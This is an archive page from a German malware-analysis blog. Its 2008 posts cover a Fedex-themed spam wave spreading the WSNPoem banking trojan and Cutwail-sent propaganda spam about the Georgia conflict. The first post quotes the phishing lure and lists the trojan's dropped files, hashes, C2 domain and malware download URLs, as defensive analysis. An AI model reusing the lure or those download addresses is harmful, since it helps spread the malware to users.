Monthly Archive for August, 2008

Page 2 of 4

wsnpoem: Fedex Tracking

Published on August 20, 2008 in Malware & Virus Analysing. 0 Comments Tags: , , , , , , , , , , .

Seit heute Nachmittag kurz nach 16:00 Uhr verbreitet sich der Banken-Trojaner WSNPoem über eine neue Spam-Welle. Diesmal ist der angebliche Absender nicht UPS sondern FEDEX:

Betreff: Fedex Tracking N_ *

Unfortunately we were not able to deliver postal package you sent on August the 1st in time because the recipients address is not correct.
Please print out the invoice copy attached and collect the package at our office

Your FEDEX

Die angebliche “Fedex Tracking Number” im Betreff variiert. Im Attachement WD6128922.zip befindet sich die ausführbare Datei WD6128922.exe, in welcher sich wsnpoem versteckt:

Filename: WD6128922.exe
File size: 73216 bytes
MD5…: df73c2b3562ef157c10ba1a16b4c8885
SHA1..: 9ffee9196fa8f305ce255925d4f4f60d380b8fdf
Erkennungsrate: 9/35 (25.72%)

Der Trojaner erstellt wie gewohnt das wsnpoem Verzeichnis im C:\WINDOWS\system32 Verzeichnis sowie die beiden DLLs audio.dll und video.dll und die Datei ntos.exe unter C:\WINDOWS.

Danach wird die Domain blatundalqik.ru (91.203.92.27) kontaktiert und eine Konfigurationsdatei herunter geladen:

GET http://blatundalqik.ru/revolution/rev.bin

Danach wird der Spam-Mailer PushDo von 66.199.242.115 bzw. 208.66.195.71 heruntergeladen:

GET http://66.199.242.115/loader.exe

In gewissen Abständen meldet sich wsnpoem wie gewohnt bei seinen Autoren:

POST http://blatundalqik.ru/revolution/rev.php

Was auch nicht fehlen darf ist eine sogenannte Rogue Software mit dem Namen Antivirus2008:

GET http://66.199.242.115/baka_upd.exe
Filename: baka_upd.exe
File size: 1575991 bytes
MD5…: 72f32eea76c7a35c419f5bdf5b3f2012
SHA1..: 844035d11eb6859f1867d6301926cc649b437f41

GET http://66.199.242.115/scan.exe
Filename: scan.exe
File size: 188416 bytes
MD5…: dfdfd6a72dd2a295c51726dfc3265470
SHA1..: a9a05f1d6b9ff232ca5e79c188baf46eac948f55

Wie immer gilt, bei verdächtigen Attachements Vorsicht walten zu lassen. Für diejenigen, für welche dieser Hinweis zu spät kommt, empfiehlt sich der Artikel Entfernen von WSNPoem um den Trojaner vom System zu entfernen.

UPDATE 22:13 Uhr

Der mit installierte Spam-Mailer PushDo scheint nach der Infektion gleich damit anzufangen, den Banken-Trojaner weiter zu verbreiten. Interessant ist jedoch, dass es sich bei den versandten E-Mails nicht um das selbe E-Mail handelt, welches ich oben beschrieben habe:

Betreff: Tracking N_ *

Unfortunately we were not able to deliver postal package you sent on August the 1st in time because the recipients address is not correct.
Please print out the invoice copy attached and collect the package at our office

Your UPS

Betreff und Signatur weichen von dem von mir beschriebenen E-Mail ab. Des Weiteren hat auch das Attachement einen anderen Namen: Fedex_89710021NR.zip. Auch der MD5-Hash des in dem Zip-Archiv enthaltenen Files scheint ein anderer zu sein:

Filename: Fedex_89710021NR.exe
File size: 55808 bytes
MD5: 992ee92b3730708738d3d9a905fd0dc6
SHA1: b4fc4ba2c7af95a01261972785dd7a363ee39a18
Erkennungsrate: 5/36 (41.67%)

UPTADE 22.08.08

Sophos hat soeben einen entsprechenden Blog-Post zu dem Thema geschrieben: SophoLab Blog: “Failed to deliver your package in 48hrs!!! Here have some malware instead”

Propaganda einmal anders

Published on August 19, 2008 in Uncategorized. 0 Comments Tags: .

In den vergangenen Tagen gab es über den “Cyberwar” zwischen Russland und Georgien viel zu Lesen. Doch das Internet kann nicht nur für Angriffe auf den Gegner verwendet werden, sondern auch für Propagandazwecke. Schon seit einigen Tagen erhalte ich immer wieder eine E-Mail mit einem Link zu einem Youtube Video “Fox News: 12 Year Old Girl Tells the Truth about Georgia”. Das E-Mail ist immer das Selbe:

Betreff: Wahrheit uber Georgien Konflikt

Ein kleines Madchen spricht die Wahrheit uber georgische Angriffe:

(YouTube manipuliert den Aufrufzahler und lasst dieses Video nicht popular werden)

2000 Tote innerhalb von 2 Tagen durch georgischen Angriff – RIP
Fur alle Kinder, Frauen, Manner die durch georgische Angriffe ermordet wurde starten wir diese Aktion.

Wir sind gegen Propaganda in deutschen Medien!
Wir sind keine Medien-Marionetten.
Wir wollten die WAHRHEIT! Wir sind das Volk!

Verbreite diese Nachricht wie ein Lauffeuer! (Emails, Blogs, Foren, ICQ)
Zusammen sind wir stark.

Was wieder einmal mehr auffällt: Es fehlen die Umlaute! Die Mails werden laut Spamhaus über das Cutwail Botnet versendet. Cutwail? Kennen wir nicht! Oder doch? Laut Wikipedia beherrbergt das Botnet 125’000 Zombies und hat eine Spam-Kapazität von 16 Milliarden E-Mails pro Tag. Interessanter für uns ist jedoch der Vermerk, dass das Cutwail Botnet mit PushDo verwandt ist (PushDo ist ein Spam-Mailer, welcher z.B. von wsnpoem nachinstalliert wird). Nun gibt es wieder einmal mehr zwei Theorien:

  • Die Autoren der E-Mail sind die Selben wie die von wsnpoem
  • Der Spam-Mailer selbst (PushDo) hat Probleme mit den Umlauten und ersetzt diese durch aou. Somit wissen wir, dass die wsnpoem und Trojan.Crypt Mails, sowie die Joe-Job Mails gegen abuse.ch höchstwahrscheinlich alle über das Cutwail Botnet (PushDo) versendet wurden!

    • Die zweite Theorie ist für mich die Wahrscheinlicher. Somit kann auch davon ausgegangen werden, dass das Botnet für den Spam-Mail versandt vermietet wird.

    Unklar ist jedoch, ob eine private Organisation / Person hinter den Propagandamails steht oder die Russische Regierung selbst РWir wissen es nicht. Eines ist jedoch sicher: In Zukunft werden solche Propaganda E-Mails in Kriegszeiten zur Tagesordnung geh̦ren.
    economics-recluse
    Scene
    Urgent!